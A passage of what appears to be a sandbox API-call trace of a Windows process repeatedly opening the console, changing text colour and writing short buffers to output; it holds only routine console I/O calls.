lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.125] GetLastError () returned 0x0 [0144.125] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0144.127] GetLastError () returned 0x0 [0144.128] CloseHandle (hObject=0x2f) returned 1 [0144.128] GetLastError () returned 0x0 [0144.128] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x4f, lpOverlapped=0x0) returned 1 [0144.128] GetLastError () returned 0x0 [0144.131] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0144.131] GetLastError () returned 0x0 [0144.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.131] GetLastError () returned 0x0 [0144.131] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0144.132] GetLastError () returned 0x0 [0144.132] CloseHandle (hObject=0x2f) returned 1 [0144.132] GetLastError () returned 0x0 [0144.135] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0144.135] GetLastError () returned 0x0 [0144.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.135] GetLastError () returned 0x0 [0144.135] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0144.136] GetLastError () returned 0x0 [0144.136] CloseHandle (hObject=0x2f) returned 1 [0144.136] GetLastError () returned 0x0 [0144.136] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.137] GetLastError () returned 0x0 [0144.140] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0144.140] GetLastError () returned 0x0 [0144.140] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.140] GetLastError () returned 0x0 [0144.140] GetConsoleOutputCP () returned 0x1b5 [0144.140] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.140] GetLastError () returned 0x0 [0144.143] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0144.143] GetLastError () returned 0x0 [0144.143] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.144] GetLastError () returned 0x0 [0144.146] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0144.147] GetLastError () returned 0x0 [0144.147] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.147] GetLastError () returned 0x0 [0144.150] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0144.150] GetLastError () returned 0x0 [0144.150] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.150] GetLastError () returned 0x0 [0144.150] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0144.151] GetLastError () returned 0x0 [0144.151] CloseHandle (hObject=0x3b) returned 1 [0144.151] GetLastError () returned 0x0 [0144.154] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0144.154] GetLastError () returned 0x0 [0144.154] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.154] GetLastError () returned 0x0 [0144.154] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0144.155] GetLastError () returned 0x0 [0144.155] CloseHandle (hObject=0x3b) returned 1 [0144.155] GetLastError () returned 0x0 [0144.155] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x3e, lpOverlapped=0x0) returned 1 [0144.155] GetLastError () returned 0x0 [0144.158] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0144.158] GetLastError () returned 0x0 [0144.158] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.159] GetLastError () returned 0x0 [0144.159] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0144.159] GetLastError () returned 0x0 [0144.159] CloseHandle (hObject=0x3b) returned 1 [0144.159] GetLastError () returned 0x0 [0144.162] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0144.162] GetLastError () returned 0x0 [0144.162] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.163] GetLastError () returned 0x0 [0144.163] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0144.163] GetLastError () returned 0x0 [0144.163] CloseHandle (hObject=0x3b) returned 1 [0144.163] GetLastError () returned 0x0 [0144.163] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.164] GetLastError () returned 0x0 [0144.167] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0144.168] GetLastError () returned 0x0 [0144.168] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.168] GetLastError () returned 0x0 [0144.168] GetConsoleOutputCP () returned 0x1b5 [0144.168] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.168] GetLastError () returned 0x0 [0144.171] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0144.171] GetLastError () returned 0x0 [0144.171] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.171] GetLastError () returned 0x0 [0144.174] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0144.174] GetLastError () returned 0x0 [0144.174] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.177] GetLastError () returned 0x0 [0144.179] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0144.180] GetLastError () returned 0x0 [0144.180] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.180] GetLastError () returned 0x0 [0144.180] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0144.180] GetLastError () returned 0x0 [0144.180] CloseHandle (hObject=0x47) returned 1 [0144.180] GetLastError () returned 0x0 [0144.183] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0144.184] GetLastError () returned 0x0 [0144.184] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.184] GetLastError () returned 0x0 [0144.184] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0144.184] GetLastError () returned 0x0 [0144.184] CloseHandle (hObject=0x47) returned 1 [0144.185] GetLastError () returned 0x0 [0144.185] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x11, lpOverlapped=0x0) returned 1 [0144.185] GetLastError () returned 0x0 [0144.188] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0144.188] GetLastError () returned 0x0 [0144.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.188] GetLastError () returned 0x0 [0144.188] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0144.188] GetLastError () returned 0x0 [0144.189] CloseHandle (hObject=0x47) returned 1 [0144.189] GetLastError () returned 0x0 [0144.192] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0144.192] GetLastError () returned 0x0 [0144.192] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.192] GetLastError () returned 0x0 [0144.192] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0144.192] GetLastError () returned 0x0 [0144.192] CloseHandle (hObject=0x47) returned 1 [0144.193] GetLastError () returned 0x0 [0144.193] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.193] GetLastError () returned 0x0 [0144.196] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0144.196] GetLastError () returned 0x0 [0144.196] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.197] GetLastError () returned 0x0 [0144.197] GetConsoleOutputCP () returned 0x1b5 [0144.197] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.197] GetLastError () returned 0x0 [0144.200] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0144.200] GetLastError () returned 0x0 [0144.200] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.200] GetLastError () returned 0x0 [0144.203] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0144.203] GetLastError () returned 0x0 [0144.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.203] GetLastError () returned 0x0 [0144.206] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0144.206] GetLastError () returned 0x0 [0144.207] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.207] GetLastError () returned 0x0 [0144.207] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0144.207] GetLastError () returned 0x0 [0144.207] CloseHandle (hObject=0x53) returned 1 [0144.207] GetLastError () returned 0x0 [0144.210] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0144.210] GetLastError () returned 0x0 [0144.210] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.211] GetLastError () returned 0x0 [0144.211] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0144.211] GetLastError () returned 0x0 [0144.211] CloseHandle (hObject=0x53) returned 1 [0144.211] GetLastError () returned 0x0 [0144.211] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x21, lpOverlapped=0x0) returned 1 [0144.212] GetLastError () returned 0x0 [0144.215] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0144.216] GetLastError () returned 0x0 [0144.216] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.217] GetLastError () returned 0x0 [0144.217] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0144.217] GetLastError () returned 0x0 [0144.217] CloseHandle (hObject=0x53) returned 1 [0144.217] GetLastError () returned 0x0 [0144.220] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0144.220] GetLastError () returned 0x0 [0144.220] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.220] GetLastError () returned 0x0 [0144.221] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0144.221] GetLastError () returned 0x0 [0144.221] CloseHandle (hObject=0x53) returned 1 [0144.221] GetLastError () returned 0x0 [0144.221] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.222] GetLastError () returned 0x0 [0144.224] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0144.246] GetLastError () returned 0x0 [0144.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.247] GetLastError () returned 0x0 [0144.247] GetConsoleOutputCP () returned 0x1b5 [0144.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.247] GetLastError () returned 0x0 [0144.250] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0144.251] GetLastError () returned 0x0 [0144.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.251] GetLastError () returned 0x0 [0144.254] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0144.254] GetLastError () returned 0x0 [0144.254] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.254] GetLastError () returned 0x0 [0144.257] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0144.257] GetLastError () returned 0x0 [0144.257] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.258] GetLastError () returned 0x0 [0144.258] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0144.258] GetLastError () returned 0x0 [0144.258] CloseHandle (hObject=0x5f) returned 1 [0144.258] GetLastError () returned 0x0 [0144.262] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0144.262] GetLastError () returned 0x0 [0144.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.262] GetLastError () returned 0x0 [0144.262] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0144.263] GetLastError () returned 0x0 [0144.263] CloseHandle (hObject=0x5f) returned 1 [0144.263] GetLastError () returned 0x0 [0144.263] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x4f, lpOverlapped=0x0) returned 1 [0144.263] GetLastError () returned 0x0 [0144.266] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0144.267] GetLastError () returned 0x0 [0144.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.267] GetLastError () returned 0x0 [0144.267] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0144.267] GetLastError () returned 0x0 [0144.267] CloseHandle (hObject=0x5f) returned 1 [0144.267] GetLastError () returned 0x0 [0144.270] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0144.271] GetLastError () returned 0x0 [0144.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.271] GetLastError () returned 0x0 [0144.271] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0144.271] GetLastError () returned 0x0 [0144.271] CloseHandle (hObject=0x5f) returned 1 [0144.272] GetLastError () returned 0x0 [0144.272] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.272] GetLastError () returned 0x0 [0144.275] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0144.275] GetLastError () returned 0x0 [0144.275] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.276] GetLastError () returned 0x0 [0144.276] GetConsoleOutputCP () returned 0x1b5 [0144.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.276] GetLastError () returned 0x0 [0144.279] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0144.279] GetLastError () returned 0x0 [0144.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.280] GetLastError () returned 0x0 [0144.282] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0144.283] GetLastError () returned 0x0 [0144.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.283] GetLastError () returned 0x0 [0144.286] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0144.286] GetLastError () returned 0x0 [0144.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.286] GetLastError () returned 0x0 [0144.286] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0144.286] GetLastError () returned 0x0 [0144.286] CloseHandle (hObject=0x6b) returned 1 [0144.287] GetLastError () returned 0x0 [0144.290] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0144.290] GetLastError () returned 0x0 [0144.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.290] GetLastError () returned 0x0 [0144.290] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0144.290] GetLastError () returned 0x0 [0144.290] CloseHandle (hObject=0x6b) returned 1 [0144.291] GetLastError () returned 0x0 [0144.291] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x19, lpOverlapped=0x0) returned 1 [0144.291] GetLastError () returned 0x0 [0144.294] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0144.294] GetLastError () returned 0x0 [0144.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.294] GetLastError () returned 0x0 [0144.294] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0144.295] GetLastError () returned 0x0 [0144.295] CloseHandle (hObject=0x6b) returned 1 [0144.295] GetLastError () returned 0x0 [0144.298] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0144.298] GetLastError () returned 0x0 [0144.298] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.298] GetLastError () returned 0x0 [0144.298] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0144.299] GetLastError () returned 0x0 [0144.299] CloseHandle (hObject=0x6b) returned 1 [0144.299] GetLastError () returned 0x0 [0144.299] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, 